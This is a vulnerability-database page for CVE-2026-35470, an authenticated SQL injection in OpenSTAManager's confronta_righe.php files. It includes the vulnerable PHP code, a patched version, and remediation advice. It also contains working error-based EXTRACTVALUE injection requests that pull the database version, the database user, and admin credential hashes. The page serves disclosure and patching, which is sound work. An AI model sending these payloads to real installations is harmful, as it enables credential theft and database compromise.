Skip to main content

PHP CVE-2026-35470

HIGH
SQL Injection (CWE-89)
2026-04-03 https://github.com/devcode-it/openstamanager GHSA-mmm5-3g4x-qw39
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch released
Apr 04, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 03, 2026 - 22:15 vuln.today
CVE Published
Apr 03, 2026 - 21:57 nvd
HIGH 8.8

DescriptionGitHub Advisory

Description

Six confronta_righe.php files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation.

An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.

Affected Files

All 6 vulnerable files share the same code pattern:

| File | Line | Affected Table |

|

Vulnerable Code

|---|------|------|----------------| | 1 | modules/fatture/modals/confronta_righe.php | 29 | co_righe_documenti | | 2 | modules/interventi/modals/confronta_righe.php | 29 | in_righe_interventi | | 3 | modules/preventivi/modals/confronta_righe.php | 28 | co_righe_preventivi | | 4 | modules/ordini/modals/confronta_righe.php | 29 | or_righe_ordini | | 5 | modules/ddt/modals/confronta_righe.php | 29 | dt_righe_ddt | | 6 | modules/contratti/modals/confronta_righe.php | 28 | co_righe_contratti |

All files follow the same pattern. Example from modules/interventi/modals/confronta_righe.php:

php
$righe = $_GET['righe'];  // Line 29 - No sanitization

$righe = $dbo->fetchArray(
    'SELECT
        `mg_articoli_lang`.`title`,
        `mg_articoli`.`codice`,
        `in_righe_interventi`.*
    FROM
        `in_righe_interventi`
        INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`
        LEFT JOIN `mg_articoli_lang` ON (...)
    WHERE
        `in_righe_interventi`.`id` IN ('.$righe.')'  // Line 41 - Direct concatenation
);

The value of $_GET['righe'] is inserted directly into the SQL IN() clause without using prepare(), parameterized statements or any sanitization function.

Reproduction

Prerequisites

  • Authenticated session (any user with module access)
  • At least one existing record in the target module (e.g. an intervention with id=1)

Step 1: Extract MySQL version

GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23

Result: XPATH syntax error: '~8.3.0'

Step 2: Extract database user

GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23

Result: XPATH syntax error: '~root@172.19.0.3'

Step 3: Extract admin credentials

GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23

Result: XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'

Evidence

<img width="1254" height="395" alt="image" src="https://github.com/user-attachments/assets/a2367ed6-fa03-4668-9d74-4298cac5e429" />

HTTP Request

http
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1
Host: <TARGET>
Cookie: PHPSESSID=<SESSION_ID>

Response (excerpt)

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'

Impact

  • Confidentiality (High): Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information
  • Integrity (High): Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries
  • Availability (High): Deletion of tables or critical data, database corruption

Remediation

Recommended Fix

Use parameterized statements with prepare() for the righe parameter:

php
// BEFORE (vulnerable):
$righe = $_GET['righe'];
$righe = $dbo->fetchArray(
    '... WHERE `in_righe_interventi`.`id` IN ('.$righe.')'
);

// AFTER (secure):
$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));
$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));
$righe = $dbo->fetchArray(
    '... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',
    $righe_ids
);

This fix must be applied to all 6 files listed in the "Affected Files" section.

Credits

Omar Ramirez

AnalysisAI

SQL injection in OpenSTAManager 2.10.1 and prior allows authenticated users to extract database contents including bcrypt password hashes, customer records, and financial data via unsanitized GET parameters across six vulnerable PHP modules. The righe parameter in confronta_righe.php files is directly concatenated into IN() clauses without parameterization. CVSS 8.8 (High) with network attack vector, low complexity, and low privilege requirement. Vendor-released patch available in version 2.10.2. Exploit reproduction demonstrated via EXTRACTVALUE-based error injection extracting MySQL version, database user, and admin credentials. Confirmed publicly available exploit code exists (GitHub advisory GHSA-mmm5-3g4x-qw39).

Technical ContextAI

OpenSTAManager is an open-source PHP-based management platform for invoicing, contracts, and service tracking. The vulnerability stems from classic CWE-89 SQL injection where user-controlled input from $_GET['righe'] is concatenated directly into dynamically constructed SQL queries. The affected code pattern repeats across six modules (fatture, interventi, preventivi, ordini, ddt, contratti), each querying different tables (co_righe_documenti, in_righe_interventi, co_righe_preventivi, or_righe_ordini, dt_righe_ddt, co_righe_contratti). The application uses PHP's dbo->fetchArray() without prepared statements, allowing injection into the IN() clause of SELECT queries. Error-based SQL injection via MySQL's EXTRACTVALUE() function enables immediate data exfiltration through XPATH syntax error messages. The CPE identifier pkg:composer/devcode-it_openstamanager indicates distribution via Composer package manager, typical for PHP business applications with database backends handling sensitive commercial data.

RemediationAI

Upgrade immediately to OpenSTAManager version 2.10.2 released by the vendor to address this SQL injection vulnerability. The patched version is available at https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2 and through Composer package updates. Organizations unable to upgrade immediately should implement application-layer input validation as a temporary mitigation: modify all six affected confronta_righe.php files to use parameterized queries by splitting the righe parameter on commas, validating each value as an integer via array_map('intval', explode(',', $_GET['righe'])), constructing placeholders with implode(',', array_fill(0, count($righe_ids), '?')), and passing the sanitized array to prepared statements. Additionally, enforce strict database user permissions limiting SELECT-only access for the application database user to minimize potential data modification impact. Review application logs for suspicious requests to confronta_righe.php endpoints containing SQL keywords (UNION, EXTRACTVALUE, CONCAT) or unusual righe parameter patterns. Post-patching, rotate all database credentials and audit user account activity if exploitation is suspected based on the demonstrated credential extraction technique.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-35470 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy